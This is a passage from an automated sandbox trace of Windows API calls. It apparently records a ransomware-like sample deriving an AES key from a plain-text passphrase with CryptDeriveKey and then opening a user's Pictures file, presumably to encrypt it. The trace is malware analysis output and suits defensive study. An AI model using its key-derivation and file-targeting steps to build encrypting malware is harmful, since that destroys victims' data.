returned 1 [0087.917] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9ef0 | out: hHeap=0x1780000) returned 1 [0087.917] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca280 | out: hHeap=0x1780000) returned 1 [0087.917] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca178 | out: hHeap=0x1780000) returned 1 [0087.917] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca1a8 | out: hHeap=0x1780000) returned 1 [0087.917] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca3b8 | out: hHeap=0x1780000) returned 1 [0087.917] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca268 | out: hHeap=0x1780000) returned 1 [0087.917] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca298 | out: hHeap=0x1780000) returned 1 [0087.917] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca3d0 | out: hHeap=0x1780000) returned 1 [0087.917] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca358 | out: hHeap=0x1780000) returned 1 [0087.918] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca2b0 | out: hHeap=0x1780000) returned 1 [0087.918] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca220 | out: hHeap=0x1780000) returned 1 [0087.918] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca1c0 | out: hHeap=0x1780000) returned 1 [0087.918] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca340 | out: hHeap=0x1780000) returned 1 [0087.918] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca370 | out: hHeap=0x1780000) returned 1 [0087.918] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca2e0 | out: hHeap=0x1780000) returned 1 [0087.918] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca310 | out: hHeap=0x1780000) returned 1 [0087.918] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca2f8 | out: hHeap=0x1780000) returned 1 [0087.918] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca1d8 | out: hHeap=0x1780000) returned 1 [0087.918] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca448 | out: hHeap=0x1780000) returned 1 [0087.918] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca388 | out: hHeap=0x1780000) returned 1 [0087.918] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca3a0 | out: hHeap=0x1780000) returned 1 [0087.918] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca3e8 | out: hHeap=0x1780000) returned 1 [0087.918] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca460 | out: hHeap=0x1780000) returned 1 [0087.918] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca400 | out: hHeap=0x1780000) returned 1 [0087.918] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca430 | out: hHeap=0x1780000) returned 1 [0087.918] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca418 | out: hHeap=0x1780000) returned 1 [0087.918] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca208 | out: hHeap=0x1780000) returned 1 [0087.918] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41a5250 | out: hHeap=0x1780000) returned 1 [0087.918] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2470 | out: hHeap=0x1780000) returned 1 [0087.918] PeekMessageW (in: lpMsg=0x144ebfc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ebfc) returned 0 [0087.918] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e9c68 | out: hHeap=0x1780000) returned 1 [0087.918] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2490 | out: hHeap=0x1780000) returned 1 [0087.918] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2470 | out: hHeap=0x1780000) returned 1 [0087.918] PeekMessageW (in: lpMsg=0x144ebfc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ebfc) returned 0 [0087.919] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2470 | out: hHeap=0x1780000) returned 1 [0087.919] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2490 | out: hHeap=0x1780000) returned 1 [0087.919] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24f0 | out: hHeap=0x1780000) returned 1 [0087.919] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca1a8 | out: hHeap=0x1780000) returned 1 [0087.919] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf950 | out: hHeap=0x1780000) returned 1 [0087.919] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1797108 | out: hHeap=0x1780000) returned 1 [0087.919] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2470 | out: hHeap=0x1780000) returned 1 [0087.919] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2350 | out: hHeap=0x1780000) returned 1 [0087.919] PeekMessageW (in: lpMsg=0x144ebfc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ebfc) returned 0 [0087.919] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e23a0 | out: hHeap=0x1780000) returned 1 [0087.919] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2470 | out: hHeap=0x1780000) returned 1 [0087.919] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a9188 | out: hHeap=0x1780000) returned 1 [0087.919] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9d28 | out: hHeap=0x1780000) returned 1 [0087.919] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9bf0 | out: hHeap=0x1780000) returned 1 [0087.919] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2200 | out: hHeap=0x1780000) returned 1 [0087.919] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf860 | out: hHeap=0x1780000) returned 1 [0087.919] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca160 | out: hHeap=0x1780000) returned 1 [0087.919] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfa68 | out: hHeap=0x1780000) returned 1 [0087.919] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2450 | out: hHeap=0x1780000) returned 1 [0087.919] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfa18 | out: hHeap=0x1780000) returned 1 [0087.919] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9bd8 | out: hHeap=0x1780000) returned 1 [0087.919] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9e30 | out: hHeap=0x1780000) returned 1 [0087.919] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf4c8 | out: hHeap=0x1780000) returned 1 [0087.919] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2190 | out: hHeap=0x1780000) returned 1 [0087.919] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf4a0 | out: hHeap=0x1780000) returned 1 [0087.919] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9d58 | out: hHeap=0x1780000) returned 1 [0087.920] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9c68 | out: hHeap=0x1780000) returned 1 [0087.920] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2230 | out: hHeap=0x1780000) returned 1 [0087.920] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfba8 | out: hHeap=0x1780000) returned 1 [0087.920] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9d70 | out: hHeap=0x1780000) returned 1 [0087.920] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4391b28 | out: hHeap=0x1780000) returned 1 [0087.920] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24e0 | out: hHeap=0x1780000) returned 1 [0087.920] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfbf8 | out: hHeap=0x1780000) returned 1 [0087.920] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9d40 | out: hHeap=0x1780000) returned 1 [0087.920] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf8d8 | out: hHeap=0x1780000) returned 1 [0087.920] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2150 | out: hHeap=0x1780000) returned 1 [0087.920] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf9a0 | out: hHeap=0x1780000) returned 1 [0087.920] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca118 | out: hHeap=0x1780000) returned 1 [0087.920] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf9c8 | out: hHeap=0x1780000) returned 1 [0087.920] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2480 | out: hHeap=0x1780000) returned 1 [0087.920] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfc98 | out: hHeap=0x1780000) returned 1 [0087.920] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca1f0 | out: hHeap=0x1780000) returned 1 [0087.920] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43595f0 | out: hHeap=0x1780000) returned 1 [0087.920] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25d0 | out: hHeap=0x1780000) returned 1 [0087.920] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca190 | out: hHeap=0x1780000) returned 1 [0087.920] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca478 | out: hHeap=0x1780000) returned 1 [0087.920] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca238 | out: hHeap=0x1780000) returned 1 [0087.920] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca580 | out: hHeap=0x1780000) returned 1 [0087.920] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4c0 | out: hHeap=0x1780000) returned 1 [0087.920] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca778 | out: hHeap=0x1780000) returned 1 [0087.920] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6e8 | out: hHeap=0x1780000) returned 1 [0087.920] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca5c8 | out: hHeap=0x1780000) returned 1 [0087.921] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfce8 | out: hHeap=0x1780000) returned 1 [0087.921] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ea2e0 | out: hHeap=0x1780000) returned 1 [0087.921] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25c0 | out: hHeap=0x1780000) returned 1 [0087.921] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca0d0 | out: hHeap=0x1780000) returned 1 [0087.921] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9e90 | out: hHeap=0x1780000) returned 1 [0087.921] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24b0 | out: hHeap=0x1780000) returned 1 [0087.921] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfb30 | out: hHeap=0x1780000) returned 1 [0087.921] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9e18 | out: hHeap=0x1780000) returned 1 [0087.921] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e22f0 | out: hHeap=0x1780000) returned 1 [0087.921] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2300 | out: hHeap=0x1780000) returned 1 [0087.921] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0087.921] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0087.921] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x43c9d28, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CloseHandle", lpUsedDefaultChar=0x0) returned 12 [0087.921] CloseHandle (hObject=0x258) returned 1 [0087.922] FreeLibrary (hLibModule=0x772d0000) returned 1 [0087.922] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTFILE", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTFILE") returned 0x12 [0087.922] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Pictures\\fW_IRtjvKhZB-.bmp", lpFindFileData=0x144ed28 | out: lpFindFileData=0x144ed28*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe1c9ef0, ftCreationTime.dwHighDateTime=0x1d5e33b, ftLastAccessTime.dwLowDateTime=0x3d10c320, ftLastAccessTime.dwHighDateTime=0x1d5ed46, ftLastWriteTime.dwLowDateTime=0x3d10c320, ftLastWriteTime.dwHighDateTime=0x1d5ed46, nFileSizeHigh=0x0, nFileSizeLow=0x19ab, dwReserved0=0x43c34c0, dwReserved1=0x8, cFileName="fW_IRtjvKhZB-.bmp", cAlternateFileName="FW_IRT~1.BMP")) returned 0x41ac540 [0087.922] FindClose (in: hFindFile=0x41ac540 | out: hFindFile=0x41ac540) returned 1 [0087.922] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0087.922] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0087.922] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLESET", cchLength=0x14 | out: lpsz="__CRYPT_DLLHANDLESET") returned 0x14 [0087.922] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0087.922] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0087.922] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0087.923] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x1796fc8, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContext", lpUsedDefaultChar=0x0) returned 20 [0087.923] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0087.923] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x1796fc8, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContextA", lpUsedDefaultChar=0x0) returned 21 [0087.923] CryptAcquireContextA (in: phProv=0x144ea08, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x144ea08*=0x41a5250) returned 1 [0087.924] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXTSET", cchLength=0x12 | out: lpsz="__CRYPT_CONTEXTSET") returned 0x12 [0087.924] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0087.924] CharUpperBuffW (in: lpsz="_CRYPT_DERIVEKEY", cchLength=0x10 | out: lpsz="_CRYPT_DERIVEKEY") returned 0x10 [0087.924] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0087.924] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0087.924] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0087.924] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0087.924] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0087.924] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0087.924] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptCreateHash", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0087.925] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptCreateHash", cchWideChar=16, lpMultiByteStr=0x43ca610, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptCreateHash", lpUsedDefaultChar=0x0) returned 16 [0087.925] CryptCreateHash (in: hProv=0x41a5250, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x144e778 | out: phHash=0x144e778) returned 1 [0087.925] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="mimniasnfiwentientienternyeirynery", cchWideChar=35, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 35 [0087.925] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="mimniasnfiwentientienternyeirynery", cchWideChar=35, lpMultiByteStr=0x17e2b18, cbMultiByte=35, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="mimniasnfiwentientienternyeirynery", lpUsedDefaultChar=0x0) returned 35 [0087.925] CharLowerBuffW (in: lpsz="byte[34]", cchLength=0x8 | out: lpsz="byte[34]") returned 0x8 [0087.925] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="mimniasnfiwentientienternyeirynery", cchWideChar=35, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 35 [0087.925] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="mimniasnfiwentientienternyeirynery", cchWideChar=35, lpMultiByteStr=0x17e2c08, cbMultiByte=35, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="mimniasnfiwentientienternyeirynery", lpUsedDefaultChar=0x0) returned 35 [0087.925] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0087.925] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0087.925] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptHashData", cchWideChar=14, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0087.925] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptHashData", cchWideChar=14, lpMultiByteStr=0x43ca490, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptHashData", lpUsedDefaultChar=0x0) returned 14 [0087.925] CryptHashData (hHash=0x41ac640, pbData=0x17e2b18, dwDataLen=0x22, dwFlags=0x1) returned 1 [0087.925] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0087.925] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0087.925] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0087.925] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDeriveKey", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0087.926] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDeriveKey", cchWideChar=15, lpMultiByteStr=0x43ca550, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDeriveKey", lpUsedDefaultChar=0x0) returned 15 [0087.926] CryptDeriveKey (in: hProv=0x41a5250, Algid=0x6610, hBaseData=0x41ac640, dwFlags=0x1, phKey=0x144e778 | out: phKey=0x144e778*=0x41ac6c0) returned 1 [0087.926] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0087.926] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0087.926] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0087.926] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x1796f08, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDestroyHash", lpUsedDefaultChar=0x0) returned 17 [0087.926] CryptDestroyHash (hHash=0x41ac640) returned 1 [0087.926] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2600 [0087.926] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x214) returned 0x43e9c68 [0087.926] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2640 [0087.926] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caac0 [0087.926] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac70 [0087.926] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cabf8 [0087.926] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2710 [0087.926] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab20 [0087.926] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cad78 [0087.926] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cace8 [0087.926] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2680 [0087.926] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2600 [0087.927] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfe78 [0087.927] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca850 [0087.927] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25b0 [0087.927] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca790 [0087.927] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25b0 [0087.927] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca910 [0087.927] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26f0 [0087.927] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e24f0 [0087.927] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20a) returned 0x43e9818 [0087.927] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2490 [0087.927] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41abfc0 [0087.927] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0087.927] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41abfc0 | out: hHeap=0x1780000) returned 1 [0087.927] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0087.927] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac700 | out: hHeap=0x1780000) returned 1 [0087.927] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0087.927] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2490 [0087.927] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf978 [0087.927] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9e30 [0087.927] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2520 [0087.927] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca358 [0087.928] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2520 | out: hHeap=0x1780000) returned 1 [0087.928] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca370 [0087.928] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e24a0 [0087.928] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24a0 | out: hHeap=0x1780000) returned 1 [0087.928] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac600 [0087.928] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10000) returned 0x43ed3b0 [0087.928] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca1f0 [0087.928] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e24a0 [0087.928] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Pictures\\fW_IRtjvKhZB-.bmp" (normalized: "c:\\users\\fd1hvy\\pictures\\fw_irtjvkhzb-.bmp"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x258 [0087.928] SetFilePointerEx (in: hFile=0x258, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0087.928] SetFilePointerEx (in: hFile=0x258, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x144eeb0 | out: lpNewFilePointer=0x0) returned 1 [0087.928] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfd10 [0087.928] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca2e0 [0087.928] RtlAllocateHeap 